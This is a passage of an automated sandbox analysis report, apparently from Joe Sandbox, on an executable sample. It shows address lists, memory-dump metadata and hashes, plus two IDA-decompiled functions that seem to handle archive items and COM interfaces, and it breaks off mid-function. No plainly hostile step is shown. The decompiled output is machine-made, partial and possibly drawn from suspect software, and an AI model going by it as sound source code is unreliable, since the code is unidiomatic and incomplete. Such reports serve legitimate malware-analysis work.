                              0x0040c0cd
                              0x0040c0d6
                              0x0040c0da
                              0x0040c0df
                              0x0040c0e6
                              0x00000000
                              0x0040c0e6
                              0x0040c048
                              0x0040c04a
                              0x0040c04d
                              0x0040c04f
                              0x0040c053
                              0x00000000
                              0x00000000
                              0x0040c059
                              0x0040c05b
                              0x0040c060
                              0x0040c060
                              0x0040c063
                              0x0040c066
                              0x0040c06a
                              0x0040c06c
                              0x0040c071
                              0x0040c071
                              0x0040c07a
                              0x0040c07e
                              0x0040c083
                              0x0040c08a
                              0x00000000
                              0x0040c08a
                              0x0040bfb3
                              0x0040bfb6
                              0x0040bfba
                              0x0040bfbc
                              0x0040bfc5
                              0x0040bfc5
                              0x00000000
                              0x0040bf45
                              0x0040bf45
                              0x0040bf48
                              0x0040bf4c
                              0x0040bf4e
                              0x0040bf53
                              0x0040bf53
                              0x0040bf56
                              0x0040bf59
                              0x0040bf5d
                              0x0040bf5f
                              0x0040bf64
                              0x0040bf64
                              0x0040bf6d
                              0x0040bf71
                              0x0040bf76
                              0x0040bf80
                              0x0040bf84
                              0x0040bf8c
                              0x0040bf90
                              0x0040bf95
                              0x0040bf98
                              0x0040bf9c
                              0x0040bf9e
                              0x0040bfa3
                              0x0040bfa3
                              0x0040bfa6
                              0x00000000
                              0x0040bfa6
                              0x0040bf43
                              0x0040be7b
                              0x0040be7f
                              0x0040be8a
                              0x0040be8e
                              0x0040be96
                              0x0040be9a
                              0x0040be9f
                              0x0040be9f
                              0x0040be9f
                              0x0040bea6
                              0x00000000
                              0x0040bea6
                              0x0040be1c
                              0x0040be1f
                              0x0040be23
                              0x0040be25
                              0x0040be2a
                              0x0040be2a
                              0x0040be33
                              0x0040be37
                              0x0040be3c
                              0x0040be46
                              0x0040be4a
                              0x0040be52
                              0x0040be56
                              0x0040be5b
                              0x0040be5e
                              0x0040be62
                              0x0040be64
                              0x0040be69
                              0x0040be69
                              0x0040be6c
                              0x00000000
                              0x0040be6c
                              0x0040bd63
                              0x0040bd6d
                              0x0040bd71
                              0x0040bd79
                              0x0040bd7d
                              0x0040bd82
                              0x0040bd85
                              0x0040bd89
                              0x00000000
                              0x0040bc23
                              0x0040bc23
                              0x0040bc26
                              0x0040bc2c
                              0x0040bc35
                              0x0040bc35
                              0x0040beab
                              0x0040beab
                              0x0040c270
                              0x0040c275
                              0x0040c27e
                              0x0040c27e

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                              • Instruction ID: 754c2283aee26f26976a66738bb4ef570e525f81dc1fbbef9a6f78583ad2e2a8
                              • Opcode Fuzzy Hash: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                              • Instruction Fuzzy Hash: 5B325D70904249DFDB10DFA8C584ADEBBB4AF58304F1441AEE855BB3C2CB78AE45CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040280D Relevance: 1.9, APIs: 1, Instructions: 384COMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E0040280D() {
				void* __ebx;
				intOrPtr* _t185;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t195;
				intOrPtr* _t196;
				signed int _t197;
				intOrPtr _t198;
				intOrPtr* _t199;
				intOrPtr* _t204;
				intOrPtr* _t207;
				signed int _t208;
				signed int _t209;
				FILETIME* _t217;
				signed int _t226;
				signed int _t227;
				FILETIME* _t228;
				FILETIME* _t244;
				signed int _t270;
				intOrPtr _t289;
				WCHAR* _t315;
				signed int _t338;
				signed int _t340;
				signed int _t342;
				intOrPtr _t344;
				intOrPtr* _t346;
				signed int _t347;
				void* _t348;

				E00413954(E0041921B, _t348);
				_t344 =  *((intOrPtr*)(_t348 + 8));
				if(E00402D80(_t344 + 0xa8) == 0) {
					_t185 =  *((intOrPtr*)(_t344 + 0x4c));
					_t270 = 0;
					__eflags = _t185;
					if(_t185 != 0) {
						 *((intOrPtr*)( *_t185 + 8))(_t185);
						 *((intOrPtr*)(_t344 + 0x4c)) = 0;
					}
					 *(_t348 - 0x58) = _t270;
					 *(_t348 - 0x56) = _t270;
					_t186 =  *((intOrPtr*)(_t344 + 0xc));
					_t338 =  *(_t348 + 0xc);
					 *(_t348 - 4) = _t270;
					_t187 =  *((intOrPtr*)( *_t186 + 0x18))(_t186, _t338, 3, _t348 - 0x58);
					__eflags = _t187 - _t270;
					if(_t187 == _t270) {
						 *(_t348 - 0x18) = _t270;
						 *(_t348 - 0x14) = _t270;
						 *(_t348 - 0x10) = _t270;
						E00402170(_t348 - 0x18, 3);
						__eflags =  *(_t348 - 0x58) - _t270;
						 *(_t348 - 4) = 1;
						if( *(_t348 - 0x58) != _t270) {
							__eflags =  *(_t348 - 0x58) - 8;
							if( *(_t348 - 0x58) == 8) {
								E00401D1B(_t348 - 0x18,  *((intOrPtr*)(_t348 - 0x50)));
								L12:
								E00401D7A(_t344 + 0x1c, _t348 - 0x18);
								__eflags =  *((intOrPtr*)(_t348 + 0x14)) - _t270;
								if( *((intOrPtr*)(_t348 + 0x14)) != _t270) {
									 *( *(_t348 + 0x10)) = _t270;
									L61:
									E00403A9C( *(_t348 - 0x18));
									 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
									E00405E34(_t348 - 0x58);
									_t195 = 0;
									__eflags = 0;
									goto L62;
								}
								 *(_t348 - 0x28) = _t270;
								 *(_t348 - 0x26) = _t270;
								_t196 =  *((intOrPtr*)(_t344 + 0xc));
								 *(_t348 - 4) = 2;
								_t197 =  *((intOrPtr*)( *_t196 + 0x18))(_t196, _t338, 9, _t348 - 0x28);
								__eflags = _t197 - _t270;
								if(_t197 == _t270) {
									__eflags =  *(_t348 - 0x28) - _t270;
									if( *(_t348 - 0x28) != _t270) {
										__eflags =  *(_t348 - 0x28) - 0x13;
										if( *(_t348 - 0x28) == 0x13) {
											_t198 =  *((intOrPtr*)(_t348 - 0x20));
											L20:
											 *((intOrPtr*)(_t344 + 0x44)) = _t198;
											_t199 =  *((intOrPtr*)(_t344 + 0xc));
											_t197 =  *((intOrPtr*)( *_t199 + 0x18))(_t199, _t338, 6, _t348 - 0x28);
											__eflags = _t197 - _t270;
											if(_t197 != _t270) {
												goto L14;
											}
											__eflags =  *((intOrPtr*)(_t348 - 0x20)) - _t270;
											 *(_t348 + 0xb) = _t270;
											 *(_t348 - 0x74) = _t270;
											 *(_t348 - 0x72) = _t270;
											 *((char*)(_t344 + 0x40)) = _t197 & 0xffffff00 |  *((intOrPtr*)(_t348 - 0x20)) != _t270;
											_t204 =  *((intOrPtr*)(_t344 + 0xc));
											 *(_t348 - 4) = 3;
											_t340 =  *((intOrPtr*)( *_t204 + 0x18))(_t204, _t338, 0x15, _t348 - 0x74);
											__eflags = _t340 - _t270;
											if(_t340 == _t270) {
												__eflags =  *(_t348 - 0x74) - 0xb;
												if( *(_t348 - 0x74) == 0xb) {
													__eflags =  *((intOrPtr*)(_t348 - 0x6c)) - _t270;
													_t66 = _t348 + 0xb;
													 *_t66 =  *((intOrPtr*)(_t348 - 0x6c)) != _t270;
													__eflags =  *_t66;
												}
												 *(_t348 - 4) = 2;
												E00405E34(_t348 - 0x74);
												_t207 =  *((intOrPtr*)(_t344 + 0xc));
												_t197 =  *((intOrPtr*)( *_t207 + 0x18))(_t207,  *(_t348 + 0xc), 0xc, _t348 - 0x28);
												__eflags = _t197 - _t270;
												if(_t197 != _t270) {
													goto L14;
												} else {
													_t208 =  *(_t348 - 0x28) & 0x0000ffff;
													__eflags = _t208 - _t270;
													if(_t208 == _t270) {
														_t209 = _t344 + 0x38;
														 *(_t348 + 0xc) = _t209;
														 *_t209 =  *((intOrPtr*)(_t344 + 0x5c));
														_t289 =  *((intOrPtr*)(_t344 + 0x60));
														L30:
														 *((intOrPtr*)(_t209 + 4)) = _t289;
														E00402155(_t348 - 0x3c);
														_t341 = 0x41b370;
														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
														 *(_t348 - 4) = 4;
														E004044BC(_t348 - 0x18, _t348 - 0x3c, __eflags);
														__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
														if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
															E00401CE1(_t348 - 0x64, _t348 - 0x18);
															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
															 *(_t348 - 4) = 6;
															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
																E004042DE(_t348 - 0x3c);
															}
															__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
															if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
																__eflags =  *(_t348 + 0xb) - _t270;
																if( *(_t348 + 0xb) == _t270) {
																	_push(_t348 - 0x3c); // executed
																	E004027A6(_t344); // executed
																}
															}
															_t335 = _t344 + 0x10;
															_push(_t348 - 0x64);
															E00402634(_t348 - 0x48, _t344 + 0x10);
															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
															 *(_t348 - 4) = 7;
															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
																E00402EE1(_t348 - 0x84);
																_push( *((intOrPtr*)(_t348 - 0x48)));
																 *(_t348 - 4) = 9;
																_t217 = E00405841(_t348 - 0xac, _t335); // executed
																__eflags = _t217;
																if(_t217 == 0) {
																	L48:
																	__eflags =  *(_t348 + 0xb) - _t270;
																	if( *(_t348 + 0xb) != _t270) {
																		L59:
																		E00401D7A(_t344 + 0x28, _t348 - 0x48);
																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																		 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																		 *(_t348 - 4) = 0xd;
																		E004042D6();
																		 *(_t348 - 4) = 2;
																		E004042AD(_t348 - 0x3c);
																		 *(_t348 - 4) = 1;
																		E00405E34(_t348 - 0x28);
																		goto L61;
																	}
																	_push(0x18);
																	_t226 = E00403A76();
																	__eflags = _t226 - _t270;
																	if(_t226 == _t270) {
																		_t342 = 0;
																		__eflags = 0;
																	} else {
																		 *(_t226 + 4) = _t270;
																		 *(_t226 + 8) =  *(_t226 + 8) | 0xffffffff;
																		 *_t226 = 0x41b354;
																		_t342 = _t226;
																	}
																	__eflags = _t342 - _t270;
																	 *(_t344 + 0x48) = _t342;
																	 *(_t348 + 0xc) = _t342;
																	if(_t342 != _t270) {
																		 *((intOrPtr*)( *_t342 + 4))(_t342);
																	}
																	_t227 =  *(_t344 + 0x48);
																	 *(_t227 + 0x10) = _t270;
																	 *(_t348 - 4) = 0xb;
																	 *(_t227 + 0x14) = _t270;
																	_t228 = E00405C43( *((intOrPtr*)(_t348 - 0x48)), 1);
																	__eflags = _t228;
																	if(_t228 != 0) {
																		E0040640D(_t344 + 0x4c, _t342);
																		 *(_t348 - 4) = 9;
																		 *( *(_t348 + 0x10)) = _t342;
																		_t341 = 0x41b370;
																		goto L59;
																	} else {
																		E00401D1B(_t344 + 0xe4,  *0x420280);
																		__eflags = _t342 - _t270;
																		 *(_t348 - 4) = 9;
																		if(_t342 != _t270) {
																			 *((intOrPtr*)( *_t342 + 8))(_t342);
																		}
																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																		 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
																		 *(_t348 - 4) = 0xc;
																		E004042D6();
																		 *(_t348 - 4) = 2;
																		E004042AD(_t348 - 0x3c);
																		 *(_t348 - 4) = 1;
																		E00405E34(_t348 - 0x28);
																		E00403A9C( *(_t348 - 0x18));
																		 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
																		E00405E34(_t348 - 0x58);
																		_t195 = 0x80004005;
																		goto L62;
																	}
																}
																_t244 = E00404BFA(_t270,  *((intOrPtr*)(_t348 - 0x48)));
																__eflags = _t244;
																if(_t244 != 0) {
																	goto L48;
																}
																E00401D1B(_t344 + 0xe4,  *0x42027c);
																E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																 *(_t348 - 4) = 0xa;
																L45:
																_t270 = 0x80004005;
																goto L46;
															} else {
																_t346 = _t344 + 0x28;
																E00401D7A(_t346, _t348 - 0x48);
																__eflags =  *(_t348 + 0xb) - _t270;
																_t315 =  *_t346;
																if( *(_t348 + 0xb) == _t270) {
																	__eflags = 0;
																	E0040483F(_t315, 0, _t270,  *(_t348 + 0xc));
																} else {
																	E0040494E(_t315);
																}
																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																 *(_t348 - 4) = 8;
																L46:
																E004042D6();
																 *(_t348 - 4) = 2;
																E004042AD(_t348 - 0x3c);
																L47:
																 *(_t348 - 4) = 1;
																E00405E34(_t348 - 0x28);
																E00403A9C( *(_t348 - 0x18));
																 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
																E00405E34(_t348 - 0x58);
																_t195 = _t270;
																goto L62;
															}
														}
														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
														 *(_t348 - 4) = 5;
														goto L45;
													}
													__eflags = _t208 - 0x40;
													if(_t208 != 0x40) {
														goto L18;
													}
													_t209 = _t344 + 0x38;
													 *(_t348 + 0xc) = _t209;
													 *_t209 =  *((intOrPtr*)(_t348 - 0x20));
													_t289 =  *((intOrPtr*)(_t348 - 0x1c));
													goto L30;
												}
											}
											 *(_t348 - 4) = 2;
											E00405E34(_t348 - 0x74);
											 *(_t348 - 4) = 1;
											E00405E34(_t348 - 0x28);
											E00403A9C( *(_t348 - 0x18));
											 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
											E00405E34(_t348 - 0x58);
											_t195 = _t340;
											goto L62;
										}
										L18:
										_t270 = 0x80004005;
										goto L47;
									}
									_t198 =  *((intOrPtr*)(_t344 + 0x64));
									goto L20;
								}
								L14:
								_t270 = _t197;
								goto L47;
							}
							E00403A9C( *(_t348 - 0x18));
							_t347 = 0x80004005;
							goto L10;
						}
						E00401D7A(_t348 - 0x18, _t344 + 0x50);
						goto L12;
					} else {
						_t347 = _t187;
						L10:
						 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
						E00405E34(_t348 - 0x58);
						_t195 = _t347;
						L62:
						 *[fs:0x0] =  *((intOrPtr*)(_t348 - 0xc));
						return _t195;
					}
				}
				_t195 = 0x80004004;
				goto L62;
			}































                              0x00402812
                              0x0040281f
                              0x00402830
                              0x0040283c
                              0x0040283f
                              0x00402841
                              0x00402843
                              0x00402848
                              0x0040284b
                              0x0040284b
                              0x0040284e
                              0x00402852
                              0x00402856
                              0x00402859
                              0x0040285f
                              0x00402869
                              0x0040286c
                              0x0040286e
                              0x00402879
                              0x0040287c
                              0x0040287f
                              0x00402882
                              0x00402887
                              0x0040288b
                              0x0040288f
                              0x0040289f
                              0x004028a4
                              0x004028cd
                              0x004028d2
                              0x004028d9
                              0x004028de
                              0x004028e1
                              0x00402cc1
                              0x00402cc3
                              0x00402cc6
                              0x00402ccb
                              0x00402cd3
                              0x00402cd8
                              0x00402cd8
                              0x00000000
                              0x00402cd8
                              0x004028e7
                              0x004028eb
                              0x004028ef
                              0x004028fc
                              0x00402900
                              0x00402903
                              0x00402905
                              0x0040290e
                              0x00402912
                              0x00402919
                              0x0040291e
                              0x0040292a
                              0x0040292d
                              0x0040292d
                              0x00402930
                              0x0040293d
                              0x00402940
                              0x00402942
                              0x00000000
                              0x00000000
                              0x00402944
                              0x00402948
                              0x0040294b
                              0x0040294f
                              0x00402956
                              0x00402959
                              0x00402966
                              0x0040296d
                              0x0040296f
                              0x00402971
                              0x004029a7
                              0x004029ac
                              0x004029ae
                              0x004029b2
                              0x004029b2
                              0x004029b2
                              0x004029b2
                              0x004029b9
                              0x004029bd
                              0x004029c2
                              0x004029d1
                              0x004029d4
                              0x004029d6
                              0x00000000
                              0x004029dc
                              0x004029dc
                              0x004029e0
                              0x004029e2
                              0x00402a00
                              0x00402a03
                              0x00402a06
                              0x00402a08
                              0x00402a0b
                              0x00402a0b
                              0x00402a11
                              0x00402a16
                              0x00402a1b
                              0x00402a24
                              0x00402a28
                              0x00402a2d
                              0x00402a30
                              0x00402a45
                              0x00402a4a
                              0x00402a4d
                              0x00402a51
                              0x00402a56
                              0x00402a56
                              0x00402a5b
                              0x00402a5e
                              0x00402a60
                              0x00402a63
                              0x00402a6a
                              0x00402a6b
                              0x00402a6b
                              0x00402a63
                              0x00402a73
                              0x00402a76
                              0x00402a7a
                              0x00402a7f
                              0x00402a82
                              0x00402a86
                              0x00402ad0
                              0x00402ad5
                              0x00402ade
                              0x00402ae2
                              0x00402ae7
                              0x00402ae9
                              0x00402b72
                              0x00402b72
                              0x00402b75
                              0x00402c6b
                              0x00402c72
                              0x00402c7d
                              0x00402c85
                              0x00402c8d
                              0x00402c95
                              0x00402c9b
                              0x00402c9f
                              0x00402ca7
                              0x00402cab
                              0x00402cb3
                              0x00402cb7
                              0x00000000
                              0x00402cb7
                              0x00402b7b
                              0x00402b7d
                              0x00402b82
                              0x00402b85
                              0x00402b98
                              0x00402b98
                              0x00402b87
                              0x00402b87
                              0x00402b8a
                              0x00402b8e
                              0x00402b94
                              0x00402b94
                              0x00402b9a
                              0x00402b9c
                              0x00402b9f
                              0x00402ba2
                              0x00402ba7
                              0x00402ba7
                              0x00402bad
                              0x00402bb3
                              0x00402bb9
                              0x00402bbd
                              0x00402bc0
                              0x00402bc5
                              0x00402bc7
                              0x00402c58
                              0x00402c60
                              0x00402c64
                              0x00402c66
                              0x00000000
                              0x00402bcd
                              0x00402bd9
                              0x00402bde
                              0x00402be0
                              0x00402be4
                              0x00402be9
                              0x00402be9
                              0x00402bf2
                              0x00402bfa
                              0x00402c02
                              0x00402c0a
                              0x00402c14
                              0x00402c18
                              0x00402c20
                              0x00402c24
                              0x00402c2c
                              0x00402c30
                              0x00402c38
                              0x00402c3d
                              0x00402c45
                              0x00402c4a
                              0x00000000
                              0x00402c4a
                              0x00402bc7
                              0x00402af2
                              0x00402af7
                              0x00402af9
                              0x00000000
                              0x00000000
                              0x00402b07
                              0x00402b12
                              0x00402b1a
                              0x00402b22
                              0x00402b2a
                              0x00402b2d
                              0x00402b31
                              0x00402b31
                              0x00000000
                              0x00402a88
                              0x00402a88
                              0x00402a91
                              0x00402a96
                              0x00402a99
                              0x00402a9b
                              0x00402aa7
                              0x00402aaa
                              0x00402a9d
                              0x00402a9d
                              0x00402a9d
                              0x00402ab2
                              0x00402aba
                              0x00402ac0
                              0x00402ac4
                              0x00402b36
                              0x00402b39
                              0x00402b41
                              0x00402b45
                              0x00402b4a
                              0x00402b4d
                              0x00402b51
                              0x00402b59
                              0x00402b5e
                              0x00402b66
                              0x00402b6b
                              0x00000000
                              0x00402b6b
                              0x00402a86
                              0x00402a32
                              0x00402a35
                              0x00000000
                              0x00402a35
                              0x004029e4
                              0x004029e7
                              0x00000000
                              0x00000000
                              0x004029f0
                              0x004029f3
                              0x004029f6
                              0x004029f8
                              0x00000000
                              0x004029f8
                              0x004029d6
                              0x00402976
                              0x0040297a
                              0x00402982
                              0x00402986
                              0x0040298e
                              0x00402993
                              0x0040299b
                              0x004029a0
                              0x00000000
                              0x004029a0
                              0x00402920
                              0x00402920
                              0x00000000
                              0x00402920
                              0x00402914
                              0x00000000
                              0x00402914
                              0x00402907
                              0x00402907
                              0x00000000
                              0x00402907
                              0x004028a9
                              0x004028af
                              0x00000000
                              0x004028af
                              0x00402898
                              0x00000000
                              0x00402870
                              0x00402870
                              0x004028b4
                              0x004028b4
                              0x004028bb
                              0x004028c0
                              0x00402cda
                              0x00402ce0
                              0x00402ce8
                              0x00402ce8
                              0x0040286e
                              0x00402832
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 00402812
                                • Part of subcall function 00402D80: EnterCriticalSection.KERNEL32(?,?,?,004095B9), ref: 00402D85
                                • Part of subcall function 00402D80: LeaveCriticalSection.KERNEL32(?,?,?,?,004095B9), ref: 00402D8F
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterH_prologLeave
                              • String ID:
                              • API String ID: 367238759-0
                              • Opcode ID: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                              • Instruction ID: 6b86c84e82b28a82bfdc9d9b9477fa58d6923614df4f06b31c284573bb568367
                              • Opcode Fuzzy Hash: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                              • Instruction Fuzzy Hash: 14F1AD30900249DFCF14EFA5C989ADEBBB4AF54318F14806EE445B72E2DB789A45CF19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408A3B Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                              Download Yara Rule
                              C-Code - Quality: 87%
                              			E00408A3B(intOrPtr __ecx) {
				intOrPtr _t181;
				signed int _t184;
				signed int* _t187;
				intOrPtr _t188;
				signed int* _t191;
				signed int* _t193;
				void* _t194;
				signed int* _t195;
				void* _t197;
				signed int* _t198;
				void* _t200;
				signed int* _t201;
				intOrPtr _t205;
				signed int* _t207;
				signed int* _t208;
				signed int* _t209;
				intOrPtr* _t213;
				intOrPtr* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t220;
				signed int* _t222;
				signed int* _t223;
				signed int* _t224;
				intOrPtr* _t232;
				signed int* _t234;
				signed int* _t235;
				signed int* _t236;
				intOrPtr* _t243;
				signed int* _t245;
				signed int* _t246;
				signed int* _t247;
				intOrPtr _t255;
				signed int _t266;
				signed int _t307;
				signed int _t313;
				intOrPtr _t317;
				signed int** _t319;
				intOrPtr _t320;
				void* _t322;

				E00413954(E00419B47, _t322);
				_push(_t313);
				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
				E00408A27(__ecx);
				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
					while(1) {
						_t317 =  *((intOrPtr*)(_t322 + 0xc));
						_t307 = 1;
						_t313 = _t313 | 0xffffffff;
						_t181 =  *((intOrPtr*)(_t317 + 8));
						 *(_t322 - 0x24) = _t313;
						if(_t181 < _t307) {
							goto L6;
						}
						L4:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= _t181) {
							L76:
							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
							_t184 = 0;
							goto L77;
						}
						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
						L7:
						if(_t266 != 0) {
							 *(_t322 - 0x38) = 0;
							 *((short*)(_t322 - 0x36)) = 0;
							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
							_t187 =  *_t319;
							 *(_t322 - 4) = _t307;
							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
							if(_t188 != 0) {
								L35:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t320 = _t188;
								E00405E34(_t322 - 0x38);
								L71:
								_t184 = _t320;
								goto L77;
							}
							if( *(_t322 - 0x38) != 0x13) {
								L75:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t266 = _t322 - 0x38;
								E00405E34(_t266);
								goto L76;
							}
							_t191 =  *_t319;
							_t313 =  *(_t322 - 0x30);
							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
							if(_t188 != 0) {
								goto L35;
							}
							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
								goto L75;
							}
							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
							E00405E34(_t322 - 0x38);
							 *(_t322 - 0x10) = 0;
							_t193 =  *_t319;
							_t266 =  *_t193;
							 *(_t322 - 4) = 2;
							_t194 =  *_t266(_t193, 0x41b228, _t322 - 0x10);
							_t195 =  *(_t322 - 0x10);
							if(_t194 != 0 || _t195 == 0) {
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								goto L52;
							} else {
								 *(_t322 - 0x14) = 0;
								_t266 =  *_t195;
								 *(_t322 - 4) = 3;
								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
								_t198 =  *(_t322 - 0x14);
								if(_t197 != 0 || _t198 == 0) {
									 *(_t322 - 4) = 2;
									goto L49;
								} else {
									 *(_t322 - 0x18) = 0;
									_t266 =  *_t198;
									 *(_t322 - 4) = 4;
									_t200 =  *_t266(_t198, 0x41b2f8, _t322 - 0x18);
									_t201 =  *(_t322 - 0x18);
									if(_t200 != 0 || _t201 == 0) {
										 *(_t322 - 4) = 3;
										goto L46;
									} else {
										E00408EA0(_t322 - 0x78);
										_push(_t322 - 0x74);
										_push(_t313);
										 *(_t322 - 4) = 5;
										_t205 = E0040836D(_t319);
										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
										if(_t205 != 0) {
											 *(_t322 - 4) = 4;
											E004038C2(_t322 - 0x78);
											_t207 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t207 != 0) {
												 *((intOrPtr*)( *_t207 + 8))(_t207);
											}
											_t208 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t208 != 0) {
												 *((intOrPtr*)( *_t208 + 8))(_t208);
											}
											_t209 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t209 != 0) {
												 *((intOrPtr*)( *_t209 + 8))(_t209);
											}
											_t184 =  *((intOrPtr*)(_t322 - 0x28));
											goto L77;
										}
										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
										 *(_t322 - 4) = 6;
										 *((intOrPtr*)( *_t213))(_t213, 0x41b218, _t322 - 0x1c);
										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
										if(_t215 != 0) {
											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
										}
										 *(_t322 - 0x58) = _t313;
										_t216 = E00408524(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
										if(_t216 == 1) {
											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t217 != 0) {
												 *((intOrPtr*)( *_t217 + 8))(_t217);
											}
											_t266 = _t322 - 0x78;
											 *(_t322 - 4) = 4;
											E004038C2(_t266);
											_t201 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											L46:
											if(_t201 != 0) {
												_t266 =  *_t201;
												 *((intOrPtr*)(_t266 + 8))(_t201);
											}
											_t198 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											L49:
											if(_t198 != 0) {
												_t266 =  *_t198;
												 *((intOrPtr*)(_t266 + 8))(_t198);
											}
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											_t195 =  *(_t322 - 0x10);
											L52:
											if(_t195 != 0) {
												_t266 =  *_t195;
												 *((intOrPtr*)(_t266 + 8))(_t195);
											}
											goto L76;
										} else {
											if(_t216 != 0) {
												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t220 != 0) {
